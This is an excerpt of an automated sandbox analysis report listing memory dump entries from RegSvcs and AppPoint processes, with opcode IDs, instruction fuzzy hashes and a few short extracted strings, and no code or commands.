                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f28d0fd9d8e349c2a0c2f711d3498eb664f1056f66af7e97908b839c3068734f
                                                                                        • Instruction ID: aa00488074555012108f1fb98ff1258c6034ff9271d0022a9c3f6d97464c734e
                                                                                        • Opcode Fuzzy Hash: f28d0fd9d8e349c2a0c2f711d3498eb664f1056f66af7e97908b839c3068734f
                                                                                        • Instruction Fuzzy Hash: F0F065313101154FE7A476BEA8A9EBF76DBFBC92A4F501035E10ACB391D916CC4183D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4116083003.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_f5d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 934e2d9a4a139de2a1f3b3458e2b91cf690dce311b02a375865af736dd376102
                                                                                        • Instruction ID: 41ef42d838e65b91d4ddeff665ef67f8c0fb1d9801e31b890abe734fd4cc87ab
                                                                                        • Opcode Fuzzy Hash: 934e2d9a4a139de2a1f3b3458e2b91cf690dce311b02a375865af736dd376102
                                                                                        • Instruction Fuzzy Hash: 9DF0C2718053449EE7208E06DDC4B62FF9CEB50335F18C05AEE484B282C2789844DB71
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e7f86335f0884bde475782cb8b2136c714b487e8fd3880de3aab1d431a127377
                                                                                        • Instruction ID: bc443192e33a1b2142f088e29b4503b97021bf812d648ce60c152f223c5afadf
                                                                                        • Opcode Fuzzy Hash: e7f86335f0884bde475782cb8b2136c714b487e8fd3880de3aab1d431a127377
                                                                                        • Instruction Fuzzy Hash: ECF04FB1E00209DFDB50DFB9D455AAEBBF5EB08300F004466DD01E7240E73495018BA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff61826757c1b1fc46f57bfa8541993ad9d413d0fecbf6186439b52c302a3682
                                                                                        • Instruction ID: ccf8cc5eb93b7c787f893c8b34bb2842d2bae23f7a2a49fe5b83b8fa8eca20aa
                                                                                        • Opcode Fuzzy Hash: ff61826757c1b1fc46f57bfa8541993ad9d413d0fecbf6186439b52c302a3682
                                                                                        • Instruction Fuzzy Hash: F001E870800219DFEF14CF6AD8183EEBAF2BF49350F188625E825AA291D7754A90CBD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c4ab32aea6c11ba4d9fcff92bd7c130da17229d35e80f7b1c7158a469b211659
                                                                                        • Instruction ID: 917e3b1b84505cc070cd27accc7cf74d4992e2c761b3b43c546f64523ce2b12f
                                                                                        • Opcode Fuzzy Hash: c4ab32aea6c11ba4d9fcff92bd7c130da17229d35e80f7b1c7158a469b211659
                                                                                        • Instruction Fuzzy Hash: FAE06D717002186FD3049A5E9C40E6BFBEDEFD9760B21806AF504D7361CAB0AC0086A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b1ca129f89e8f076fb02f188b7b0f42c452b7bc5905229dbb94b042c44c4a172
                                                                                        • Instruction ID: 68839e7e99baff3887626c3866206a53eecadd3ed9e33099c0c9670a53f1f107
                                                                                        • Opcode Fuzzy Hash: b1ca129f89e8f076fb02f188b7b0f42c452b7bc5905229dbb94b042c44c4a172
                                                                                        • Instruction Fuzzy Hash: B8F0DAB0D4420A9FDB84DFA9D841AAEBBF5FB48300F1049A9D919E7241E77595108F91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f77adb4cd9234e44c2990646a5b217ab437d3ea4f7ba011bb924285cef9a187
                                                                                        • Instruction ID: 30b28f134254870aa2b1de51daee0a559629658d89239507a192abe9c0d6c369
                                                                                        • Opcode Fuzzy Hash: 8f77adb4cd9234e44c2990646a5b217ab437d3ea4f7ba011bb924285cef9a187
                                                                                        • Instruction Fuzzy Hash: A6E065353041509FD3209F19E894D56BBF6FF9936172650ABF909CB762C9319C02C710
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27268600d7a0376129a4a44e0c6d7c2721c1437e61d0371ab75edb54a9384042
                                                                                        • Instruction ID: 3306432b118432e896297e33171bd179398ca54b9a9347db5c75d8fd4615eef6
                                                                                        • Opcode Fuzzy Hash: 27268600d7a0376129a4a44e0c6d7c2721c1437e61d0371ab75edb54a9384042
                                                                                        • Instruction Fuzzy Hash: F9E0DF73E0020867EF50DAA8E9463DF7398DB03218F248461D414DB200E13ADA0983C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c5111e481dece3b7d5a49bf9d67743706bee6093f00fa41be8f62789d2a2c9e
                                                                                        • Instruction ID: 526332b607d6c51a672b679f6349207f54489b70594464b5de4f3aa8552d1b22
                                                                                        • Opcode Fuzzy Hash: 7c5111e481dece3b7d5a49bf9d67743706bee6093f00fa41be8f62789d2a2c9e
                                                                                        • Instruction Fuzzy Hash: 61E0DF313001045F9B04AA6EA884C6EBBEBFFC966436880B9EA0EC7351CE21EC064390
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a6ee1bebe39d4ffd401e4bb4bceff4eee7a9f3360dc3c77a1daf3c8c951fa97d
                                                                                        • Instruction ID: 4b0dd9add4fc56d97ceca1d72a7e545f0b6bd2a62814b025b48de5f15e8ed1ec
                                                                                        • Opcode Fuzzy Hash: a6ee1bebe39d4ffd401e4bb4bceff4eee7a9f3360dc3c77a1daf3c8c951fa97d
                                                                                        • Instruction Fuzzy Hash: 8AF03075E00714AB9B34CFA9E80089EBBF9FF49710B00896AE45593641D771E918CFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41faf8ae54b2dd770024261d6fedfa969b622759da360ba327b979e4bc8b69f5
                                                                                        • Instruction ID: 4ff36640ab5affe6c65efa27570dd5d8c174e222855800d5733bd9ea727c9bbf
                                                                                        • Opcode Fuzzy Hash: 41faf8ae54b2dd770024261d6fedfa969b622759da360ba327b979e4bc8b69f5
                                                                                        • Instruction Fuzzy Hash: 82F0E570A05208DFC701EFB4E88159D7F75EF01205B10059ADC0597211DA3A2E07EB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a7dff85914d75952fde9df4d930cd3eb4181081b87e316a5dba935ce21d12da7
                                                                                        • Instruction ID: 7ba38857369e2dde2d044e999efe1001858a1cb4e8eec173137ec9a23cc8c950
                                                                                        • Opcode Fuzzy Hash: a7dff85914d75952fde9df4d930cd3eb4181081b87e316a5dba935ce21d12da7
                                                                                        • Instruction Fuzzy Hash: 12E0D83070A7648FCB32DF68A4004AABBF5EF465507010A5FD456C7581CB60E9068785
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e95fab08ae23ac4e6ee7483fbffe4d14117f904b0481cf2584ec683b9d5dfb8
                                                                                        • Instruction ID: 68adda22fe4768aa6e495f67a88dcd292fada94515f5b1fff24e315311437836
                                                                                        • Opcode Fuzzy Hash: 7e95fab08ae23ac4e6ee7483fbffe4d14117f904b0481cf2584ec683b9d5dfb8
                                                                                        • Instruction Fuzzy Hash: E1E08C363001046FC3108A0EEC88D06FBEDFFC8630B11802AFA09C7320CA30AC01C6A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe647b4bb172fdcf4afc1d1319aeb1dd69765e34b387be72cd050510ef95dac8
                                                                                        • Instruction ID: 185785d4207f248de33ac64d9ff15f37d83117ee786a3f9e89634dcaee1bdba5
                                                                                        • Opcode Fuzzy Hash: fe647b4bb172fdcf4afc1d1319aeb1dd69765e34b387be72cd050510ef95dac8
                                                                                        • Instruction Fuzzy Hash: E1E08630715714979F34AE6CA44486E73E9FB45714B411E1AE946C3680CB60E9048789
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c6c798eaec97b1ab58481fce197823c0351b2319cd6c99e4feb665d03e0a908
                                                                                        • Instruction ID: d237b4b4bcc740037fda29fe7043f83488dbc5377a908f8ba962986762dbdea0
                                                                                        • Opcode Fuzzy Hash: 7c6c798eaec97b1ab58481fce197823c0351b2319cd6c99e4feb665d03e0a908
                                                                                        • Instruction Fuzzy Hash: 66E0CD362082444FD7519F90F8408557FA5FB50200B014073D844CB452D611D516D741
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27a508b95bce8c79855e3f920739054bf9b262628e7ed1046f08dc637ed7a21e
                                                                                        • Instruction ID: b291a416d8e330b99a30531f0f3cedd05e4beb27f57287811b257b1def1a6f2e
                                                                                        • Opcode Fuzzy Hash: 27a508b95bce8c79855e3f920739054bf9b262628e7ed1046f08dc637ed7a21e
                                                                                        • Instruction Fuzzy Hash: 92D0A73020E2A00FC70223A8B4105ECBF79DF8B251F1114A7D5498B593CD814C0347D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b13051145ad5c4cc80180532be0af6313bb0cb91cf5ae9238c44913dffe71478
                                                                                        • Instruction ID: fc552223b7513cce22ef88745ce81ac0a7c01402bb5f4e17d4fd4f292c3aa027
                                                                                        • Opcode Fuzzy Hash: b13051145ad5c4cc80180532be0af6313bb0cb91cf5ae9238c44913dffe71478
                                                                                        • Instruction Fuzzy Hash: DDE0E670A0120DEFCB00FFA4ED8555EBBBAEB45315B104659E804A7754DB366E01DB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 092aa2f98c6c3a0286e305efd88d4601f23e4158221f8771ae38144a2ca0c9e6
                                                                                        • Instruction ID: dd42e5d840f299388e32b42a88618f1b72be935df4b1122d4b2ca9b33030c772
                                                                                        • Opcode Fuzzy Hash: 092aa2f98c6c3a0286e305efd88d4601f23e4158221f8771ae38144a2ca0c9e6
                                                                                        • Instruction Fuzzy Hash: C7D06C3620021EBB8F01AE85EC05DDB3B2AEB996A0B148015FA1416251C272A961EBE0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2474f9f71e9b18ec3fb78b692ef8b5fb43b399bae6b46374c6417c598f948521
                                                                                        • Instruction ID: dd8517cfce7ece75d8ae7c21f4e29a9658e0745fe3067429697d0855c1800270
                                                                                        • Opcode Fuzzy Hash: 2474f9f71e9b18ec3fb78b692ef8b5fb43b399bae6b46374c6417c598f948521
                                                                                        • Instruction Fuzzy Hash: 52B09B2135413513DD0471DD74106DD728E47C5565F001067960D877854DC59C4102DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0a2d8d4a4b8f82b6ae3363747a53661bd5ffc6fbfd45be9abced2418b2248114
                                                                                        • Instruction ID: a98d0e8861dc81e85dae0747ea20651455a73339dd3a727deba55948030505d9
                                                                                        • Opcode Fuzzy Hash: 0a2d8d4a4b8f82b6ae3363747a53661bd5ffc6fbfd45be9abced2418b2248114
                                                                                        • Instruction Fuzzy Hash: B7C04CF56007109F8770DF39F444853BBF5FB486103004E09B856C2604C774EC459BA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 31e5041645558fb3f8b4c195311ff9c38a1c9a9f461d31ec07b72d19d2ad8fcf
                                                                                        • Instruction ID: 7b417f9d7426ae52c701bea451991605fc32ed071c06df5f85b1ea6f36cbd518
                                                                                        • Opcode Fuzzy Hash: 31e5041645558fb3f8b4c195311ff9c38a1c9a9f461d31ec07b72d19d2ad8fcf
                                                                                        • Instruction Fuzzy Hash: C2C012B00012008ADF189F58A08C6583A51EB42328B301E499018891C1C672C543D7C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4120216480.0000000005000000.00000040.00000800.00020000.00000000.sdmp, Offset: 05000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_5000000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 35bed1b756fc2e82c9bd1a921412d0305eb1b717f39bf97fb9fffa7b974ba44f
                                                                                        • Instruction ID: a54397bd04f5af4e48c84dd469db325e7a551a43b994a31cdb8892bd5cc4d4e3
                                                                                        • Opcode Fuzzy Hash: 35bed1b756fc2e82c9bd1a921412d0305eb1b717f39bf97fb9fffa7b974ba44f
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-3929485403
                                                                                        • Opcode ID: 7ed2ae9292bf24b1fbf16185c1187ca45337e201838575d96714c19456964a72
                                                                                        • Instruction ID: df68a20fe3254f0ba13a032eb5e004fdd6595ffdcd6b1e44c0e8eb8afcecdc35
                                                                                        • Opcode Fuzzy Hash: 7ed2ae9292bf24b1fbf16185c1187ca45337e201838575d96714c19456964a72
                                                                                        • Instruction Fuzzy Hash: 8D91AFB1E00209DFEB54EBB5E995BAFB6F6AF84340F118029E4029B291DF349C45DBD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .5~q$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-1301248726
                                                                                        • Opcode ID: b5ce65416615fd98335fe9d4deee9c18f8da236d519e2729af97baa45cdb7e16
                                                                                        • Instruction ID: ae50a975b9dcfc584dd285982903e4cffcbc88ecc6f670beaa4cf4953af3c71b
                                                                                        • Opcode Fuzzy Hash: b5ce65416615fd98335fe9d4deee9c18f8da236d519e2729af97baa45cdb7e16
                                                                                        • Instruction Fuzzy Hash: 59F14A31B002098FDB58EBB9D855A6EB7F2BF84340F20842DD5069B3A6DE35DD46CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-1582559945
                                                                                        • Opcode ID: 2078ca4ad95cf16ce57ebc416f372e4a6d59ed25dcd01603ef4aa3f5b9a5ddbe
                                                                                        • Instruction ID: 879724b3506c45f2f9075123d853dea178f51cf8438700cf35ec4fdf8c1a8105
                                                                                        • Opcode Fuzzy Hash: 2078ca4ad95cf16ce57ebc416f372e4a6d59ed25dcd01603ef4aa3f5b9a5ddbe
                                                                                        • Instruction Fuzzy Hash: F071A232F202198FDB58DFA8E54056EB7AAEF85340F105569D406EB281DB31ED46CBC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-2113499236
                                                                                        • Opcode ID: a0c1f03032b88d582bdb58e437393b5d4b33b2a31a2339c940119e2071f76a87
                                                                                        • Instruction ID: da88413cf2dbc8401686e5fd05690e7d68570df2179837d7d3a7cc58f95f6bb3
                                                                                        • Opcode Fuzzy Hash: a0c1f03032b88d582bdb58e437393b5d4b33b2a31a2339c940119e2071f76a87
                                                                                        • Instruction Fuzzy Hash: 92B15E31E102088FDB58EBA9D8906AEB7B2FF84340F248429D505DB395DE35ED86CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LRfq$LRfq$$fq$$fq
                                                                                        • API String ID: 0-1810675050
                                                                                        • Opcode ID: cf8466cc3f932a89ced860b721acb2fb9616b765d345af060b386c4a803eeb3d
                                                                                        • Instruction ID: d4553fdc2acb33d426d39c1c5f75bb7abe2429269cb37ef85548dc31abd89f42
                                                                                        • Opcode Fuzzy Hash: cf8466cc3f932a89ced860b721acb2fb9616b765d345af060b386c4a803eeb3d
                                                                                        • Instruction Fuzzy Hash: 2861D431B002058FDB58EB78E851B6EB3E6FF88740F108569E506AB3A5DE31ED058BD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-2113499236
                                                                                        • Opcode ID: c922071be2e59c2fe062013ff42770cf31858e17a5ec5cf781cf7d0e6cc8b5ec
                                                                                        • Instruction ID: e066b5abaf3300401f45880431930817ec16b628b98722d7c051d57d0f592319
                                                                                        • Opcode Fuzzy Hash: c922071be2e59c2fe062013ff42770cf31858e17a5ec5cf781cf7d0e6cc8b5ec
                                                                                        • Instruction Fuzzy Hash: 1F51AD71F102099BDB64EB68E8806AEB3A2EF89340F11452AE407DB391DE35DC46CBD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8jq
                                                                                        • API String ID: 0-3286795621
                                                                                        • Opcode ID: ead330bf1d6415e448304a9fc7693294ddc601836c91f1f1e6d0c1b6f8472159
                                                                                        • Instruction ID: b7c325f28c95b716490f4828e8c62b675685e5a25bb31a701efb8c301a84fc52
                                                                                        • Opcode Fuzzy Hash: ead330bf1d6415e448304a9fc7693294ddc601836c91f1f1e6d0c1b6f8472159
                                                                                        • Instruction Fuzzy Hash: 96327F34B00206CFCB15DF7AD59062B73B6FB89345B148968C51A8B399EB39ED81CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tPfq
                                                                                        • API String ID: 0-3170913260
                                                                                        • Opcode ID: 74a7ffc66b76a029addd6db240236afe4f80926a3e9af5a098cc585259e6d673
                                                                                        • Instruction ID: 49b46cc661d96bde5e9e840908ec4bd216b8ad3876898c93de4f8e6fb525816d
                                                                                        • Opcode Fuzzy Hash: 74a7ffc66b76a029addd6db240236afe4f80926a3e9af5a098cc585259e6d673
                                                                                        • Instruction Fuzzy Hash: 7D3126707412208FCB5AAB78C49881D7BF2AF8A71536108B9E506CF3B2DE35DC42CB80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tPfq
                                                                                        • API String ID: 0-3170913260
                                                                                        • Opcode ID: 8b712ce31741677773f0f16beeec81000c3fdebe66c217175ad9d9d38e4dacfe
                                                                                        • Instruction ID: 91e13538b665bff907ec64fedd9e497309dd13fd260e5800e2f01440b7511d51
                                                                                        • Opcode Fuzzy Hash: 8b712ce31741677773f0f16beeec81000c3fdebe66c217175ad9d9d38e4dacfe
                                                                                        • Instruction Fuzzy Hash: 142128747402218FCB59AB79C49881D77E2EF8A71536118B8E506CF371DE36DC42CB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 986477aa1db286dd4ff4b8468fdfb7b3644487d2ea68428e334be6c3b3fab07f
                                                                                        • Instruction ID: a900603364de16c48972c709f91dcd2cef8322c3ea859e111e9a7286ea0eadd7
                                                                                        • Opcode Fuzzy Hash: 986477aa1db286dd4ff4b8468fdfb7b3644487d2ea68428e334be6c3b3fab07f
                                                                                        • Instruction Fuzzy Hash: B281C035A003058FCB269BB5C45869EBBB2EF88310F18896DD517AB364DF75AD85CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6dab9e51ea34b16558db985a10ea2ee11009e3fce022d9a1ff042b3b10e84f4
                                                                                        • Instruction ID: 29fa1392cc217695fe549da3f0acbefa4169ba0674514a339bab344b00a16980
                                                                                        • Opcode Fuzzy Hash: b6dab9e51ea34b16558db985a10ea2ee11009e3fce022d9a1ff042b3b10e84f4
                                                                                        • Instruction Fuzzy Hash: 5A11CE76E002458FCB05DFB5D9408AEFBB1FF8920071081AAE519DB261E7349844CFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.1795225827.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2fe0000_AppPoint.jbxd
